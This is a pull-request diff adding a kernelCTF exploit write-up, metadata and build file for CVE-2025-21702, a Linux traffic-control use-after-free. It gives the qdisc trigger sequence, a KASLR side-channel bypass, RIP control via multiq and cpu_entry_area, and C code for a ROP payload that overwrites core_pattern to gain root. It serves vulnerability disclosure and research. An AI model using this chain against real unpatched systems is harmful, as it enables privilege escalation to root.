Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
175 changes: 175 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-21702_mitigation/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,175 @@
# Overview

A vulnerability occurs when `sch->limit` is set to 0 in `pfifo_tail_enqueue()`[1]. If `sch->limit` is 0, `__qdisc_queue_drop_head()` does not decrease the qlen when dropping a packet [2]. Subsequently, `qdisc_enqueue_tail()` increases the qlen [3], resulting in qlen imbalance between the pfifo and the parent qdisc.

```c
static int pfifo_tail_enqueue(struct sk_buff *skb, struct Qdisc *sch,
struct sk_buff **to_free)
{
unsigned int prev_backlog;

if (likely(sch->q.qlen < sch->limit)) // [1]
return qdisc_enqueue_tail(skb, sch);

prev_backlog = sch->qstats.backlog;
/* queue full, remove one skb to fulfill the limit */
__qdisc_queue_drop_head(sch, &sch->q, to_free); // [2]
qdisc_qstats_drop(sch);
qdisc_enqueue_tail(skb, sch); // [3]

qdisc_tree_reduce_backlog(sch, 0, prev_backlog - sch->qstats.backlog);
return NET_XMIT_CN;
}
```

We can trigger the UAF as follows.

- Create a Qdisc DRR `1:`
- Create a Class DRR `1:1`
- Create a Qdisc DRR `2:` as a child of `1:1`
- Create a Class DRR `2:1`
- Create a Class DRR `2:2`
- Create a Qdisc PFIFO `3:` as a child of `2:1`
- Create a Qdisc NetEM `4:` as a child of `2:2`

- Send a packet to `3:`

- Delete the Class DRR `2:1`

- Send a packet to `4:`

- Delete the Class DRR `1:1`

- Send a packet to trigger the UAF

# KASLR Bypass

We used a timing side channel attack to leak the kernel base.

# RIP Control

For mitigation kernel, we use multiq Qdisc to bypass mitigations. We allocate the multiq Qdisc to `cl->qdisc`.

```c
static int multiq_init(struct Qdisc *sch, struct nlattr *opt,
struct netlink_ext_ack *extack)
{
struct multiq_sched_data *q = qdisc_priv(sch);
int i, err;

q->queues = NULL;

if (!opt)
return -EINVAL;

err = tcf_block_get(&q->block, &q->filter_list, sch, extack);
if (err)
return err;

q->max_bands = qdisc_dev(sch)->num_tx_queues;

q->queues = kcalloc(q->max_bands, sizeof(struct Qdisc *), GFP_KERNEL); // [4]
if (!q->queues)
return -ENOBUFS;
for (i = 0; i < q->max_bands; i++)
q->queues[i] = &noop_qdisc;

return multiq_tune(sch, opt, extack);
}
```

When initializing the multiq Qdisc, `q->queues` is allocated in `multiq_init()` [4]. At this point, the object size can be controlled to be `q->max_bands*sizeof(struct Qdisc *)`. Since `q->max_bands` is a user-controllable value, an object of any desired size can be allocated. To bypass mitigation, allocate an object larger than `0x2000`, which uses the page allocator. Then, delete the multiq Qdisc and allocate the `ctl_buf` objects into the freed `q->queues`.

```c
static struct sk_buff *multiq_peek(struct Qdisc *sch)
{
struct multiq_sched_data *q = qdisc_priv(sch);
unsigned int curband = q->curband;
struct Qdisc *qdisc;
struct sk_buff *skb;
int band;

for (band = 0; band < q->bands; band++) {
/* cycle through bands to ensure fairness */
curband++;
if (curband >= q->bands)
curband = 0;

/* Check that target subqueue is available before
* pulling an skb to avoid head-of-line blocking.
*/
if (!netif_xmit_stopped(
netdev_get_tx_queue(qdisc_dev(sch), curband))) {
qdisc = q->queues[curband];
skb = qdisc->ops->peek(qdisc); // [5]
if (skb)
return skb;
}
}
return NULL;

}
```

Next, when a packet is sent, `multiq_peek()` is called from `drr_dequeue()`. It then references `q->queues` and calls `qdisc->ops->peek()` [5]. Using `ctl_buf`, it overwrites `q->queues[]` with the address of the `cpu_entry_area`. As a result, `qdisc->ops` can also be set to an address within `cpu_entry_area`, and finally, the RIP can be controlled.

# Post-RIP

For the mitigation kernel, the payload is stored in the `cpu_entry_area` as follows.

```c
// Fill the CPU entry area exception stack of HELPER_CPU with a
// struct cpu_entry_area_payload
static void setup_cpu_entry_area() {
if (fork()) {
return;
}

struct cpu_entry_area_payload payload = {};

payload.regs[0] = kbase + QDISC_RESET; // multiq->ops->peek
payload.regs[1] = kbase + POP_POP_RET;
payload.regs[2] = kbase + PUSH_RBX_POP_RSP_RBP_RET; // multiq->ops->reset
payload.regs[3] = PAYLOAD_LOCATION(1) - PEEK_OFF ; // fake ops
payload.regs[4] = kbase + POP_RDI_POP_RSI_POP_RDX_POP_RET;
payload.regs[5] = kbase + CORE_PATTERN;
payload.regs[6] = MMAP_ADDR;
payload.regs[7] = strlen((char*)MMAP_ADDR);
payload.regs[8] = 0;
payload.regs[9] = kbase + COPY_FROM_USER;
payload.regs[10] = kbase + MSLEEP;

set_affinity(1);
signal(SIGFPE, sig_handler);
signal(SIGTRAP, sig_handler);
signal(SIGSEGV, sig_handler);
setsid();

while(1){
write_cpu_entry_area(&payload);
usleep(10000);
}
}
```

When RIP is controlled, `qdisc_reset()` is called first.

```c
void qdisc_reset(struct Qdisc *qdisc)
{
const struct Qdisc_ops *ops = qdisc->ops;

trace_qdisc_reset(qdisc);

if (ops->reset)
ops->reset(qdisc); // [6]

__skb_queue_purge(&qdisc->gso_skb);
__skb_queue_purge(&qdisc->skb_bad_txq);

qdisc->q.qlen = 0;
qdisc->qstats.backlog = 0;
}
```

In `qdisc_reset()`, `ops->reset()` is called with the address of the `cpu_entry_area` in the `RBX` register [6]. Therefore, ROP can be performed by modifying `ops->reset()` into a stack pivot gadget. The `core_pattern` overwrite technique is used to gain root shell access.
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
- Requirements:
- Capabilities: CAP_NET_ADMIN, CAP_NET_RAW
- Kernel configuration: CONFIG_NET_SCHED
- User namespaces required: Yes
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=57dbb2d83d10 (sched: add head drop fifo queue)
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=647cef20e649c576dff271e018d5d15d998b629d (pfifo_tail_enqueue: Drop new packet when sch->limit == 0)
- Affected Version: v2.6.34 - v6.14-rc1
- Affected Component: net/sched
- Cause: Use-After-Free
- Syscall to disable: disallow unprivileged username space
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2025-21702
- Description: In the Linux kernel, the following vulnerability has been resolved: pfifo_tail_enqueue: Drop new packet when sch->limit == 0 Expected behaviour: In case we reach scheduler's limit, pfifo_tail_enqueue() will drop a packet in scheduler's queue and decrease scheduler's qlen by one. Then, pfifo_tail_enqueue() enqueue new packet and increase scheduler's qlen by one. Finally, pfifo_tail_enqueue() return `NET_XMIT_CN` status code. Weird behaviour: In case we set `sch->limit == 0` and trigger pfifo_tail_enqueue() on a scheduler that has no packet, the 'drop a packet' step will do nothing. This means the scheduler's qlen still has value equal 0. Then, we continue to enqueue new packet and increase scheduler's qlen by one. In summary, we can leverage pfifo_tail_enqueue() to increase qlen by one and return `NET_XMIT_CN` status code. The problem is: Let's say we have two qdiscs: Qdisc_A and Qdisc_B. - Qdisc_A's type must have '->graft()' function to create parent/child relationship. Let's say Qdisc_A's type is `hfsc`. Enqueue packet to this qdisc will trigger `hfsc_enqueue`. - Qdisc_B's type is pfifo_head_drop. Enqueue packet to this qdisc will trigger `pfifo_tail_enqueue`. - Qdisc_B is configured to have `sch->limit == 0`. - Qdisc_A is configured to route the enqueued's packet to Qdisc_B. Enqueue packet through Qdisc_A will lead to: - hfsc_enqueue(Qdisc_A) -> pfifo_tail_enqueue(Qdisc_B) - Qdisc_B->q.qlen += 1 - pfifo_tail_enqueue() return `NET_XMIT_CN` - hfsc_enqueue() check for `NET_XMIT_SUCCESS` and see `NET_XMIT_CN` => hfsc_enqueue() don't increase qlen of Qdisc_A. The whole process lead to a situation where Qdisc_A->q.qlen == 0 and Qdisc_B->q.qlen == 1. Replace 'hfsc' with other type (for example: 'drr') still lead to the same problem. This violate the design where parent's qlen should equal to the sum of its childrens'qlen. Bug impact: This issue can be used for user->kernel privilege escalation when it is reachable.
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
exploit:
gcc -o exploit ./exploit.c -lkeyutils -static

prerequisites:
sudo apt-get install libkeyutils-dev
Binary file not shown.
Loading
Loading